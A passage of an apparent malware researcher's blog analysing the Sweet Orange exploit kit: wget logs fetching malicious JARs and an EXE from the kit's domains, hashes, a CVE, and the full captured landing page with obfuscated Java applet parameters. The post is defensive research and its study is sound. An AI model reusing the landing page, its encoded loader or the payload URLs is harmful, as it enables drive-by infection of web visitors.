  Content-Length: 15048
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-java-archive
Length: 15048 (15K) [application/x-java-archive]
Saving to: `lnMFTpPw.jar'

     0K .......... ....                                       100%  143K=0.1s

2013-03-23 (143 KB/s) - `lnMFTpPw.jar' saved [15048/15048]


4. With the payload URL from wepawet lets get that too


2013-03-23 (251 KB/s) - `questions-4.php' saved [52306/52306]

--2013-03-23--  hxxp: //familyteapie9.biz/uploads.php?intl=726&front=13&flash=45&impressum=1261&a%20pps=341&redir=115&howto=532&book=50&store=77
Resolving familyteapie9.biz... 5.199.171.217
Connecting to familyteapie9.biz|5.199.171.217|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Pragma: no-cache
  Server: Apache/2.2.22 (Win32) PHP/5.2.17
  Content-Length: 25600
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/octet-stream
Length: 25600 (25K) [application/octet-stream]
Saving to: `uploads.exe'

     0K .......... .......... .....                           100%  168K=0.1s

2013-03-23 (168 KB/s) - `uploads.exe' saved [25600/25600]


Pretty straight forward stuff.

5. Quick analysis:

NWHrh.jar:
MD5: 0ebb676f95151bb7de53a71fa6c54ef4
VT: 10/46
CVE-2012-1723

lnMFTpPw.jar:
MD5: 51410123ef71233d8e8acac4b1c06b62
VT: 9/46

exe:
MD5: e9540bc25cc38e09466147d4ccbf7b75
VT: 12/46

Have noticed a few things though:

6. Calling the landing with different params gives different feedback


Fetching these variants:
2013-03-24 21:29:29--  hxxp: //familyteapie4.biz/ServerAdministrator/urls/questions.php?video=526&problems=985&oracle=79&people=719&topics=11
--2013-03-24 21:30:00--  hxxp: //familyteapie4.biz/ServerAdministrator/urls/questions.php?oracle=79
--2013-03-24 21:38:07--  hxxp: //familyteapie4.biz/ServerAdministrator/urls/questions.php?video=526&problems=985&oracle=79&people=719
--2013-03-24 21:38:33--  hxxp: //familyteapie4.biz/ServerAdministrator/urls/questions.php?video=526&problems=985&oracle=79
--2013-03-24 21:39:03--  hxxp: //familyteapie4.biz/ServerAdministrator/urls/questions.php?video=526&oracle=79&people=719
--2013-03-24 21:39:36--  hxxp: //familyteapie4.biz/ServerAdministrator/urls/questions.php?oracle=79&people=719


will give two different results:

-rw-rw-r-- 1 remnux remnux 52330 2013-03-24 21:29 questions-oracle.php
-rw-rw-r-- 1 remnux remnux  3184 2013-03-24 21:30 questions-oracle-1.php
-rw-rw-r-- 1 remnux remnux 51328 2013-03-24 21:38 questions-oracle-2.php
-rw-rw-r-- 1 remnux remnux  3156 2013-03-24 21:38 questions-oracle-3.php
-rw-rw-r-- 1 remnux remnux 51328 2013-03-24 21:39 questions-oracle-4.php
-rw-rw-r-- 1 remnux remnux  3156 2013-03-24 21:39 questions-oracle-5.php

Where the 5xxxx Byte is the landing from above and the 3xxx Byte is the landing below

<html><head>
<meta name="Keywords" content=" acronym, china, conservation, free  acronym,  acronym, wine" />
<meta name="author" content="acronym"  />
<meta name="robots" content="noindex,nofollow">
<meta name="Description" content="acronym" />
<title>acronym</title></head>
<body  bgcolor=ffffff>
<form>
  <fieldset>
    <legend>Personalia:</legend>
    Name: <input type="text" size="30"><br>
    Email: <input type="text" size="30"><br>
    Date of birth: <input type="text" size="10">
  </fieldset>
</form>

<applet  archive="ZFGdRgwA"  code="oVv.class"  width="30"  height="38">
<param value="103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj96sdj111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107sdj110sdj96sdj99sdj114sdj45sdj111sdj103sdj111sdj62sdj97sdj110sdj110sdj106sdj114sdj60sdj49sdj52sdj50sdj37sdj103sdj100sdj107sdj111sdj60sdj51sdj55sdj50sdj37sdj101sdj113sdj110sdj109sdj115sdj60sdj48sdj49sdj37sdj98sdj110sdj117sdj100sdj113sdj60sdj52sdj54sdj50sdj37sdj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj52sdj48sdj37sdj98sdj107sdj104sdj98sdj106sdj60sdj49sdj49sdj51sdj37sdj114sdj115sdj96sdj101sdj101sdj60sdj50sdj53sdj51sdj37sdj111sdj104sdj119sdj100sdj107sdj60sdj52sdj54sdj51sdj37sdj104sdj108sdj96sdj102sdj100sdj60sdj52sdj47sdj47" name="EOHPifL" />
<param value="86sdj117sdj77sdj49sdj47sdj75sdj65sdj45sdj100sdj119sdj100" name="XvrfNMu" />
<param value="108sdj96sdj115sdj103" name="AdbmXfUGgx" />
</applet>

<form>
  <fieldset>
    <legend>Personalia:</legend>
    Name: <input type="text" size="30"><br>
    Email: <input type="text" size="30"><br>
    Date of birth: <input type="text" size="10">
  </fieldset>
</form>


<applet  archive="YJbzv"  code="IPR.class"  width="30"  height="38">
<param  value="103sdj115sdj115sdj111sdj57sdj46sdj46sdj101sdj96sdj108sdj104sdj107sdj120sdj115sdj100sdj96sdj111sdj104sdj100sdj56sdj45sdj97sdj104sdj121sdj46sdj116sdj111sdj107sdj110sdj96sdj99sdj114sdj45sdj111sdj103sdj111sdj62sdj97sdj110sdj110sdj106sdj114sdj60sdj49sdj52sdj50sdj37sdj103sdj100sdj107sdj111sdj60sdj51sdj55sdj50sdj37sdj101sdj113sdj110sdj109sdj115sdj60sdj48sdj49sdj37sdj98sdj110sdj117sdj100sdj113sdj60sdj52sdj54sdj50sdj37sdj104sdj108sdj111sdj113sdj100sdj114sdj114sdj116sdj108sdj60sdj48sdj49sdj52sdj48sdj37sdj98sdj107sdj104sdj98sdj106sdj60sdj49sdj49sdj51sdj37sdj114sdj115sdj96sdj101sdj101sdj60sdj50sdj53sdj51sdj37sdj111sdj104sdj119sdj100sdj107sdj60sdj52sdj54sdj51sdj37sdj104sdj108sdj96sdj102sdj100sdj60sdj52sdj47sdj47"  name="sSpwknEHBp" />
<param  value="86sdj117sdj77sdj49sdj47sdj75sdj65sdj45sdj100sdj119sdj100"  name="TvSRUWW" />
<param  value="108sdj96sdj115sdj103"  name="SyLIfT" />
</applet>

<form>
  <fieldset>
    <legend>Personalia:</legend>
    Name: <input type="text" size="30"><br>
    Email: <input type="text" size="30"><br>
    Date of birth: <input type="text" size="10">
  </fieldset>
</form>


<form>
  <fieldset>
    <legend>Personalia:</legend>
    Name: <input type="text" size="30"><br>
    Email: <input type="text" size="30"><br>
    Date of birth: <input type="text" size="10">
  </fieldset>
</form>
 
</body>
</html>

Same thing happens with strange user-agent and so on too, so to me it seems like SO is defaulting to this landing if something goes wrong.

Changes in use of parameters seen live by @kafeine over at Malware don't need coffee

 

7. The JARs name and class names vary

JAR filename and class filename seem to be obfuscated/randomized quite often
Applets seen last couple of days:


     16 ZFGdRgwA
     15 YJbzv
     11 mcINkf
     10 YZjcS
      4 NWHrh
      4 iaXbsJ
      4 dukuKs
      3 WpSKDOjL
      3 lnMFTpPw
      3 FGImY
      1 KQfEq
      1 JULeR
      1 CFcrzxiN
      1 ADyjw

Seem to be a pattern here [a-zA-Z]{5,8}
Look here for JAR analysis

8. SO seen from the network

landing












jars












exe













Ooops no MZ for the exe file -> obfuscated -> need to look into the java code(done here)

9. Detection


Seems like the signatures over @malwaresigs are still good.

10. The End


The fresh juice is served!

Happy squeezing Sweet Orange exploit Kit!